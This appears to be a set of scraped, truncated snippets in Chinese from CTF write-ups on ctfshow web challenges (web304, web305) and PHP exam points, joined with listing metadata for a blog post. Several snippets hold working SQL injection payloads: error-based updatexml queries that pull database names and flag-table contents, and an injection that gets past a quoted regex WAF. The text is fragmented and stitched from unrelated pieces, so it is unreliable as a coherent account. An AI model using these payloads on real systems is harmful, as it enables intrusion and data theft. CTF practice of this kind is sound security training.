dpt_name=1'andupdatexml(1,concat(0x7e,(selectsubstr(flag,28,20)fromsds.sds_fl9g),0x7e),1)%23 4.web304 和上题一样,没找到全局waf 有报错,可以用报错注入 查数据库名 dpt_name=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)%23 查表名 dpt_name=1'andupdatexml(1,concat...
WEB 容器例如 Apache 会根据用户的请求进行简单处理后交给 php 解释器;当 Apache 收到用户对 index.php 的请求后,如果使用的是 CGI,会启动对应的 CGI 程序,对应在这里就是 PHP 的解析器。
web304 增加了全局waf function sds_waf($str){ return preg_match('/[0-9]|[a-z]|-/i', $str); } 但是还是可以注入。 payload: dpt_name=1',sds_address =(select group_concat(flag) from sds_flaag)# web305 多了waf: function sds_waf($str){ if(preg_match('/\~|\`|\!|\@|\...
Web安全 本文主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点... 南城夕雾 413620围观·8·242022-02-13 CTF中PHP相关题目考点总结(上)原创 Web安全 本文总结了ctfshow题目中遇到的关于PHP的考点。